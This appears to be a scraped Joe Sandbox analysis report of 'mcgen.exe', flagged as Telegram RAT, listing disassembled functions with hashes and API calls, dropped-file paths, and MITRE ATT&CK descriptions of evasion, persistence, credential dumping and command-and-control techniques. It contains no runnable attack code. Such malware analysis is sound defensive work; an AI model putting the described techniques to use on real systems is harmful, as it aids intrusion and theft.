Opcode ID: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
Instruction ID: 69276e544058adc13a159c7ae155a1bff360f2672d6e5058cb9eeb57c755f2b5
Opcode Fuzzy Hash: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
Instruction Fuzzy Hash: 46319162B08A8295EA249F55E4407A923E1FF45F88F502272EE0D97B99DF3CE90DC744

Function 00007FF695D149F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 00007FF695D14A7B
LoadStringW.USER32 ref: 00007FF695D14A94

Strings

Adding %-58s , xrefs: 00007FF695D14A16

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: LoadString
String ID: Adding %-58s
API String ID: 2948472770-2059140559
Opcode ID: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
Instruction ID: 342d6166d40948fa65286a62388c0e71b0b33fee394eb18a76babefd48c39e2d
Opcode Fuzzy Hash: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
Instruction Fuzzy Hash: B3116D61B19B81C5EA248F16E940069B7E1FF94FC4F54A676CE4CD3324EE3CE90A8348

Function 00007FF695CD5DB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695CD5E1B
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695CD5E2F

Strings

;%%0%du, xrefs: 00007FF695CD5E0A

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: swprintf
String ID: ;%%0%du
API String ID: 233258989-2249936285
Opcode ID: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
Instruction ID: 2c271cb3f98519f8ae0ac373d07c2b4dfaf6486983cb0e313f47e0dff1e988c3
Opcode Fuzzy Hash: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
Instruction Fuzzy Hash: F5116323A0868096E6309B24E5103E977E0FB88B44F495175EB4D87799DE7CE949CB44

Function 00007FF695CF331C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF695D042CC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695D0430F

GetVolumeInformationW.KERNEL32(?,00007FF695CF0BED,?,?,00000000,?,?,00007FF695CEF30F,00000000,00007FF695CD6380,?,00007FF695CD2EC8), ref: 00007FF695CF337E

Strings

FAT, xrefs: 00007FF695CF3388
FAT32, xrefs: 00007FF695CF339D

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: InformationVolumeswprintf
String ID: FAT$FAT32
API String ID: 989755765-1174603449
Opcode ID: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
Instruction ID: fec6eb2aa3e59e1d58b070ae7001fecc365ca0eb9f8fd587f01d415f8badfdf8
Opcode Fuzzy Hash: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
Instruction Fuzzy Hash: F7118232618A4291F7709B50E8812AA63E0FF85B44F807175E94DC3A99DF3CE90D8B08

Function 00007FF695D1B974 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF695D1B97B
GetLastError.KERNEL32 ref: 00007FF695D1B986

Part of subcall function 00007FF695CECA40: _CxxThrowException.LIBVCRUNTIME ref: 00007FF695CECEDE

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00007FF695D1B990

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: ErrorExceptionLastObjectSingleThrowWait
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 564652978-2248577382
Opcode ID: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
Instruction ID: a0d8f05f9ca8562bf5f0f4aa9a531f52a1f027209ac462f34013c676e869ba28
Opcode Fuzzy Hash: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
Instruction Fuzzy Hash: DEE01A22E0980282F624AB24AC8207433E0EF51F74F9023B0D43EC61E19F2CAD4FC309

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report mcgen.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\ ? ? \Display (1).png

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

C:\Users\user\AppData\Local\Temp\RES8ED.tmp

C:\Users\user\AppData\Local\Temp\WiSkp.zip

C:\Users\user\AppData\Local\Temp\_MEI32122\VCRUNTIME140.dll

C:\Users\user\AppData\Local\Temp\_MEI32122\_bz2.pyd

C:\Users\user\AppData\Local\Temp\_MEI32122\_ctypes.pyd

Windows Analysis Report
mcgen.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre